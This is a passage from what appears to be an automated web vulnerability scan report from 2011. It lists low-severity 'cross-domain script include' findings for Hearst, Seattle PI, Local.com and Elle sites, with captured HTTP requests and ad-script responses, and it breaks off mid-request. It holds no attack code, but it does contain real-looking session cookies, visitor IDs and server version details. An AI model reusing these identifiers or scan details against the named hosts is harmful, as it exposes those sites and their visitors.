Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316295397553&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2Fflashtalking%2Fftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A%2F%2Fmpc.mxptint.net%2F1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26cachebuster%3D272524.66208301485%2526ftguid%253D1343AC00FD7B0F%2526ftcfid%253D237666001%2526ftoob%253D%2526ftsg%253Dadg&refer=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F300x250%2Fht_1064834_61686626%3Ft%3D1316295375688%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=838a74cddbeb6ddecfad61578129

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=83e0f8336bb36aba6f4b9bf3f72d; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 16:35:25 GMT
Content-Length: 808

document.write('<iframe src="http://afe.specificclick.net/serve/v=5;m=3;l=24536;c=176942;b=1044949;ts=20110917123525" width="728" height="90" border="0" frameborder="0" marginwidth="0" marginheight="0
...[SNIP]...
0]; s.async = true; s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el); })();document.write('<script language="Javascript" type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=24536&campId=176942"></script>
...[SNIP]...
19.9. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?l=24537&sz=300x250&wr=j&t=j&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F300x250%2Fht_1064834_61686626%3Ft%3D1316295043061%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F&r=http%3A%2F%2Fwww.seattlepi.com%2F&rnd=920257 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295043061&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=8335ff53b00524f964d967e96250

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=849ec9c3dd18d6b098300dde7b92; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 16:48:22 GMT
Content-Length: 1520

document.write('<iframe src="http://afe.specificclick.net/serve/v=5;m=3;l=24537;c=177141;b=1049887;ts=20110917124823" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="
...[SNIP]...
0]; s.async = true; s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el); })();document.write('<script language="Javascript" type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=24537&campId=177141"></script>
...[SNIP]...
19.10. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?l=24537&sz=300x250&wr=j&t=j&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F300x250%2Fht_1064834_61686626%3Ft%3D1316295392631%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F&r=http%3A%2F%2Fwww.seattlepi.com%2F&rnd=378488 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295392631&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=838a74cddbeb6ddecfad61578129

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 16:35:21 GMT
Content-Length: 1462

document.write('<div style="z-index:10; position:relative; width:300px">'+'<scr'+'ipt language="JavaScript" type="text/javascript" src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&p
...[SNIP]...
0]; s.async = true; s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el); })();document.write('<script language="Javascript" type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=24537&campId=176617"></script>
...[SNIP]...
19.11. http://afe.specificclick.net/serve/v=5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /serve/v=5;m=3;l=24536;c=176942;b=1044949;ts=20110917123525 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316295397553&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2Fflashtalking%2Fftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A%2F%2Fmpc.mxptint.net%2F1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26cachebuster%3D272524.66208301485%2526ftguid%253D1343AC00FD7B0F%2526ftcfid%253D237666001%2526ftoob%253D%2526ftsg%253Dadg&refer=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F300x250%2Fht_1064834_61686626%3Ft%3D1316295375688%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=83e0f8336bb36aba6f4b9bf3f72d

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=84e869bfe0b4863dcef753150272; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 16:53:23 GMT
Vary: Accept-Encoding
Content-Length: 1845
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
5%3Bm=3%3Bl=24536%3Bc=176942%3Bb=1044949%3Bts=20110917125324%3Bdct=;ord=1316278404?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.SpecificMedia.com/B5645537.30;sz=728x90;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=24536%3Bc=176942%3Bb=1044949%3Bts=20110917125324%3Bdct=;ord=1316278404?"></SCRIPT>
...[SNIP]...
<img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110917125324&cmxid=2101.020017694201044949xmc" style="display: none" height="1" width="1" border="0" /><script type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=24536&campId=176942"></script>
...[SNIP]...
19.12. http://afe.specificclick.net/serve/v=5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /serve/v=5;m=3;l=24537;c=176942;b=1044948;ts=20110917124135 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27704D7D_10F5909%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=284706.307342276%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=8436053a140c7d8ad92ac8e95005

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=843b4712134f40e3eed737c2bff8; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 16:41:35 GMT
Vary: Accept-Encoding
Content-Length: 1731
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
%3Bm=3%3Bl=24537%3Bc=176942%3Bb=1044948%3Bts=20110917124135%3Bdct=;ord=1316277695?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.SpecificMedia.com/B5645537.31;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=24537%3Bc=176942%3Bb=1044948%3Bts=20110917124135%3Bdct=;ord=1316277695?"></SCRIPT>
...[SNIP]...
19.13. http://corporate.local.com/mk/get/advertising-opportunities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://corporate.local.com
Path:   /mk/get/advertising-opportunities

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mk/get/advertising-opportunities HTTP/1.1
Host: corporate.local.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: sid=88811a43-0af3-4ba9-88a3-70e025fb1d32; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=23621f6d-15b3-4a75-bfd2-b297c2a7c0ab&expdate=634544410222441200; localcom_yb=cid=&sid=1e153b27-a9cd-45a3-8cf7-8c3ec8b313ac&exp=634518508222441200; session_start_time=1316295497762; k_visit=1; s_cc=true; campid=710; s_nr=1316295523375; s_sq=%5B%5BB%5D%5D; scorecardresearch=645461750-1183165914-1316295498491; __utma=177062200.605228499.1316295499.1316295499.1316295499.1; __utmb=177062200.1.10.1316295499; __utmc=177062200; __utmz=177062200.1316295499.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|273A6659051D259E-40000130E002F1B9[CE]; __qca=P0-1368744640-1316295502134; k_push8=1

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:57:34 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html

<!doctype html>

<html lang="en" class="no-js">

<head>

       <title>Exact Match Local Business Solutions : Local.com - 800-984-4155</title>

       <meta name="description" content="Exact Match L
...[SNIP]...
<div id="pageContentAD" class="landing">

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js"></script>
...[SNIP]...
<!-- Grab Google CDN's jQuery. fall back to local if necessary -->


       <script src="http://jqueryui.com/ui/jquery.ui.core.js"></script>

<script src="http://jqueryui.com/ui/jquery.ui.widget.js"></script>

       <!--http://jqueryui.com/demos/accordion/-->
<script type="text/javascript" src="http://jqueryui.com/ui/jquery.ui.accordion.js"></script>

       <script src="http://flesler-plugins.googlecode.com/files/jquery.scrollTo-1.4.2-min.js"></script>

       <script src="http://flesler-plugins.googlecode.com/files/jquery.localscroll-1.2.7-min.js"></script>

       <script src="http://flesler-plugins.googlecode.com/files/jquery.serialScroll-1.2.2-min.js"></script>

<script src="http://html5form.googlecode.com/svn/trunk/jquery.html5form-min.js"></script>
...[SNIP]...
19.14. http://corporate.local.com/mk/get/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://corporate.local.com
Path:   /mk/get/contact-us

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mk/get/contact-us HTTP/1.1
Host: corporate.local.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.local.com/mk/get/advertising-opportunities
Cookie: sid=88811a43-0af3-4ba9-88a3-70e025fb1d32; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=23621f6d-15b3-4a75-bfd2-b297c2a7c0ab&expdate=634544410222441200; localcom_yb=cid=&sid=1e153b27-a9cd-45a3-8cf7-8c3ec8b313ac&exp=634518508222441200; session_start_time=1316295497762; k_visit=1; s_cc=true; campid=710; s_nr=1316295534475; s_sq=%5B%5BB%5D%5D; scorecardresearch=645461750-1183165914-1316295498491; __utma=177062200.605228499.1316295499.1316295499.1316295499.1; __utmb=177062200.1.10.1316295499; __utmc=177062200; __utmz=177062200.1316295499.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|273A6659051D259E-40000130E002F1B9[CE]; __qca=P0-1368744640-1316295502134; k_push8=1; JSESSIONID=f83097412fe16$5Cg$F0

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:58:04 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-Type: text/html

<!doctype html>

<html lang="en" class="no-js">

<head>

       <title>Contact Us : Local.com</title>

       <meta name="description" content="." />

       <meta name="keywords" content="" />

       <m
...[SNIP]...
<!-- Grab Google CDN's jQuery. fall back to local if necessary -->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

       <script src="http://jqueryui.com/ui/jquery.ui.core.js"></script>

<script src="http://jqueryui.com/ui/jquery.ui.widget.js"></script>

       <!--http://jqueryui.com/demos/accordion/-->
<script type="text/javascript" src="http://jqueryui.com/ui/jquery.ui.accordion.js"></script>

       <script src="http://flesler-plugins.googlecode.com/files/jquery.scrollTo-1.4.2-min.js"></script>

       <script src="http://flesler-plugins.googlecode.com/files/jquery.localscroll-1.2.7-min.js"></script>

       <script src="http://flesler-plugins.googlecode.com/files/jquery.serialScroll-1.2.2-min.js"></script>

<script src="http://html5form.googlecode.com/svn/trunk/jquery.html5form-min.js"></script>
...[SNIP]...
19.15. http://ellegirl.elle.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 66273
Content-Type: text/html; charset=UTF-8
Date: Sat, 17 Sep 2011 16:31:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
</script>
<script type="text/javascript" src="http://hfm.checkm8.com/adam/cm8adam_1_call.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- Acudeo companion banner loader script. -->
                   <script type="text/javascript" src="http://cdna.tremormedia.com/acudeo/banners.js"></script>
...[SNIP]...
</script>
<script
   type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- start Exelate -->
<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=156&c=118749&g=003&ctg=014"></SCRIPT>
...[SNIP]...
<!-- start Skimlinks -->
<script
   type="text/javascript"
   src="http://ellegirlcom.skimlinks.com/api/skimlinks.js"></script>
...[SNIP]...
</iframe>
<script
   language="javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- Audience Science - Start -->
<script
   src="http://js.revsci.net/gateway/gw.js?csid=F10931"></script>
...[SNIP]...
19.16. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-9503572870358044&output=html&h=250&slotname=3032637931&w=300&lmt=1316312780&flash=10.3.183&url=http%3A%2F%2Fwww.quickandsimple.com%2F&dt=1316294779987&bpp=90&shv=r20110907&jsv=r20110914&correlator=1316294780139&frm=4&adk=3286472499&ga_vid=514748641.1316294780&ga_sid=1316294780&ga_hid=996858722&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=10&biw=1071&bih=870&eid=36887101&ref=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=354&xpc=nXbZZpuMrJ&p=http%3A//www.quickandsimple.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 16:36:13 GMT
Server: cafe
Cache-Control: private
Content-Length: 11918
X-XSS-Protection: 1; mode=block
Expires: Sat, 17 Sep 2011 16:36:13 GMT

<!doctype html><html><head><style>a{color:#0b9993}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.17. http://hearst.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:22:30 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 12826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
19.18. http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /about-hearst/corporate-george-r-hearst-jr.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-hearst/corporate-george-r-hearst-jr.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/about-hearst/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:00 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 13460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
19.19. http://hearst.com/about-hearst/corporate-mark-e-aldam.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /about-hearst/corporate-mark-e-aldam.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-hearst/corporate-mark-e-aldam.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:04 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 13962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
19.20. http://hearst.com/about-hearst/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /about-hearst/index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-hearst/index.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:22:47 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 11168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hearst Corporation</title>
<meta name="keywords" content=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
19.21. http://hearst.com/newspapers/albany-times-union.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /newspapers/albany-times-union.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /newspapers/albany-times-union.php HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/the-advocate.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
